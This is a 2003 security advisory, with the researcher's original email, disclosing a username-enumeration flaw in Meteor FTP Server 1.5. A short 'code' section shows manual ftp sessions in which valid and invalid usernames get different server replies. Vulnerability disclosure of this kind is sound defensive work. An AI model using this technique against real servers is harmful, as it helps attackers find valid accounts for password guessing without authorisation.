Meteor FTP Server Discloses Whether a Specified Username is Valid or Not
|
|
SecurityTracker Alert ID: 1006853
|
|
CVE Reference: GENERIC-MAP-NOMATCH
(Links to External Site)
|
Date: May 27 2003
|
Impact: Disclosure of user information
|
Exploit Included: Yes
|
Description: Ziv Kamir reported an information disclosure vulnerability in the Meteor FTP Server. A remote user can determine valid usernames on the server.
During a failed login attempt, the server reportedly returns different information depending on whether the username is incorrect
or the password is incorrect. If a remote user attempts to login using an invalid username, the server will respond with:
Login
failed.
If a remote user attempts to login using a valid username on the server, the server will respond with:
331 User name
okay, need password
A remote user can exploit this behavior to obtain a list of valid usernames on the FTP server.
The vendor
has reportedly been notified (on 27/05/2003).
|
Impact: A remote user can determine whether a specified username exists on the FTP server.
|
Solution: No solution was available at the time of this entry.
|
Vendor URL: 66.235.19.241/ (Links to External Site)
|
Cause: Access control error, State error
|
Underlying OS: Windows (Any)
|
Reported By: Ziv Kamir <vulncode@yahoo.com>
|
Message History:
None.
|
Source Message Contents
|
Date: Tue, 27 May 2003 12:08:59 -0700 (PDT)
From: Ziv Kamir <vulncode@yahoo.com>
Subject: Vulnerability in the Meteor Ftp Server .
|
This is a multi-part message in MIME format.
--------------040909010902010704000300
Content-Type: text/plain; charset=us-ascii; format=flowed
Content-Transfer-Encoding: 7bit
Hi .
Any remote attacker can obtain a list of Valid Users from the server
The Server will act Different for Valid user and for not a valid one .
Attach Txt File with Explain
------------------------------------------------------------------------
Do you Yahoo!?
The New Yahoo! Search
<http://us.rd.yahoo.com/search/mailsig/*http://search.yahoo.com> -
Faster. Easier. Bingo.
--------------040909010902010704000300
Content-Type: text/plain;
name="Meteor-Ftp.txt"
Content-Transfer-Encoding: 7bit
Content-Disposition: inline;
filename="Meteor-Ftp.txt"
27/05/03
Ziv Kamir
---------
-------------------------------------------------------
Application: Meteor FTP Server
Web Site: http://66.235.19.241/
Versions: 1.5
Platform: Windows
Bug: Obtain a List Of Valid Users .
Credits:
########
#################################
# #
# Ziv Kamir #
# #
# Email : vulncode@yahoo.com #
# #
# #
#################################
---------------------
1) Introduction
2) Bug
3) The Code
4) Fix
===============
1) Introduction
===============
Meteor FTP is a personal FTP server designed for the Microsoft Windows 98 and Windows Millenium Editi
on operating systems. It is also
compatible with Windows 2000 and Windows XP.
======
2) Bug
======
Any remote attacker can obtain a list of Valid Users from the server
The Server will act Different for Valid user and for not a valid one .
===========
3) The Code
===========
Not Valid User ( The Username Is Not_Valid_User )
--------------
c:\ ftp The_Ftp_Server_IP_Address
User (x.x.x.x:(none)): Not_Valid_User
530 Not logged on
Login failed.
Valid User ( The Username Is vuln )
----------
c:\ ftp The_Ftp_Server_IP_Address
User (x.x.x.x:(none)): vuln
331 User name okay, need password
Password:
======
4) Fix
======
Date of Vendor Notification:
27/05/03
Status:
Waiting to answer from the author.
===========================================================
*** The Data is for educational purpose only. ***
===========================================================
--------------040909010902010704000300--
|
|
